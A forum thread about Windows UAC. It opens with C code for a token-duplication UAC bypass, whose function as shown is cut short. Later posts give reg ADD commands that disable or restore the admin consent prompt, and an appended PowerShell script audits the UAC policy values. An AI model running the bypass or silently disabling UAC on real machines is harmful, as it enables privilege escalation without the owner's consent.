#1
UAC bypass implementation
This is an implementation of a UAC bypass method (Author: CIA & James Forshaw).
Works from Windows 7 to the latest Windows 10 Fall Creators Update. Code:
int StepOverUAC()
{
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.bInheritHandle = TRUE;
    sa.lpSecurityDescriptor = NULL;
    if (!CreatePipe(&inRead, &inWrite, &sa, 0)) return 0;
    if (!CreatePipe(&outRead, &outWrite, &sa, 0)) return 0;
    NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken");
    RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid");
    NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken");
    DWORD Error, bytesIO;
    NTSTATUS Status;
    HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
    HANDLE filterToken = NULL;
    BOOL bCond = FALSE;
    SHELLEXECUTEINFO shinfo, sh;
    SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
    TOKEN_MANDATORY_LABEL tml, *ptml;
    PSID pIntegritySid = NULL;
    STARTUPINFO si, si2;
    PROCESS_INFORMATION pi, pi2;
    WCHAR szBuffer[MAX_PATH];
    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
    shinfo.cbSize = sizeof(shinfo);
    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
    shinfo.lpFile = L"wusa.exe";
    shinfo.nShow = SW_HIDE;
    if (!ShellExecuteEx(&shinfo)) return 0;
    if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken)) return 0;
    TerminateProcess(shinfo.hProcess, -1);
    WaitForSingleObject(shinfo.hProcess, -1);
    if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) return 0;
    if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID, 0, 0, 0, 0, 0, 0, 0, &pIntegritySid)) return 0;
    tml.Label.Attributes = SE_GROUP_INTEGRITY;
    tml.Label.Sid = pIntegritySid;
    Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml));
    if (!NT_SUCCESS(Status)) return 0;
    filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken);
    if (!ImpersonateLoggedOnUser(filterToken)) return 0;
}
#2
See this post for the latest developments in UAC bypass, updated just 3 days ago, in our sister forum:
Windows 10 Redstone 1/2 UAC changes
#4
Even very hot & latest W10?
#5
There is nothing hot about it :P
#6
How to restore UAC to the 1st or 2nd position with an exe or with a regfile?
Sometimes I telework on Windows in other languages and it is difficult to find UAC and restore it back to normal. Thanks!
__________________
Decode and Conquer
#7
To turn off UAC completely:
Code:
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0
Code:
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5
Last edited by 0xall0c; 03-20-2018 at 15:46. Reason: corrected double slashes, which are not needed when running from cmd
#8
In cmd:
Code:
C:\Users\Nicolae>reg ADD / HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0
ERROR: Invalid key name.
Type "REG ADD /?" for usage.
Maybe
Code:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /f
and
Code:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 5 /f
What is /f for?
__________________
Decode and Conquer
#9
/f makes sure to overwrite if the specified key value already exists, without prompting the user.
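The reg ADD commands in posts #7 and #8 only write one value blind. The script below is an added example for this thread (not code posted by any of the participants): it reads the UAC policy values under the same registry key, explains what the current ConsentPromptBehaviorAdmin setting means, flags the weakened states (0 for silent elevation, EnableLUA=0, PromptOnSecureDesktop=0), and offers the PowerShell equivalent of the "/d 5 /f" restore command. It assumes an elevated PowerShell session on Windows 7 or later; the meanings of values 1 to 4 are taken from the Windows policy documentation and are not on this page.

```powershell
# Added example (not from the thread): audit the UAC policy values that the
# reg ADD commands above modify, and restore the default admin prompt if asked.
# Assumes an elevated PowerShell session on Windows 7 or later.
$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# ConsentPromptBehaviorAdmin: how a member of Administrators is prompted to elevate.
# 0 and 5 are the values used in this thread; 1-4 are the other documented settings.
$AdminBehavior = @{
    0 = 'Elevate without prompting (UAC effectively off for administrators)'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries (default)'
}

function Get-UacPolicyState {
    # Values that were never set read back as $null; Windows then applies its defaults.
    $p = Get-ItemProperty -Path $PolicyKey -ErrorAction Stop
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
    }
}

function Test-UacWeakened {
    param([Parameter(Mandatory)]$State)
    $findings = @()
    if ($State.EnableLUA -eq 0) {
        $findings += 'EnableLUA=0: UAC is disabled entirely (takes effect after the next reboot)'
    }
    if ($State.ConsentPromptBehaviorAdmin -eq 0) {
        $findings += 'ConsentPromptBehaviorAdmin=0: administrators elevate silently (what "reg ADD ... /d 0" sets)'
    }
    if ($State.PromptOnSecureDesktop -eq 0) {
        $findings += 'PromptOnSecureDesktop=0: elevation prompts are drawn on the normal desktop, where other windows can overlay them'
    }
    return $findings
}

function Restore-UacDefaultPrompt {
    # PowerShell equivalent of: reg ADD ... /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f
    # Set-ItemProperty overwrites an existing value without asking, which is what /f does for reg.exe.
    Set-ItemProperty -Path $PolicyKey -Name ConsentPromptBehaviorAdmin -Value 5 -Type DWord
}

$state = Get-UacPolicyState
$state | Format-List

if ($null -eq $state.ConsentPromptBehaviorAdmin) {
    Write-Host 'ConsentPromptBehaviorAdmin is not set; the Windows default (5) applies.'
} else {
    Write-Host ('ConsentPromptBehaviorAdmin={0}: {1}' -f $state.ConsentPromptBehaviorAdmin,
        $AdminBehavior[[int]$state.ConsentPromptBehaviorAdmin])
}

$findings = Test-UacWeakened -State $state
if ($findings.Count -eq 0) {
    Write-Host 'UAC policy looks intact.'
} else {
    $findings | ForEach-Object { Write-Warning $_ }
    # Uncomment to put the admin prompt back to the default, as post #7 does with /d 5:
    # Restore-UacDefaultPrompt
}
```

Reading the key with Get-ItemProperty works in any language build of Windows, which answers the "hard to find UAC in other languages" problem from post #6 without hunting through the localized control panel; the restore function is left commented out so the script is read-only unless you opt in.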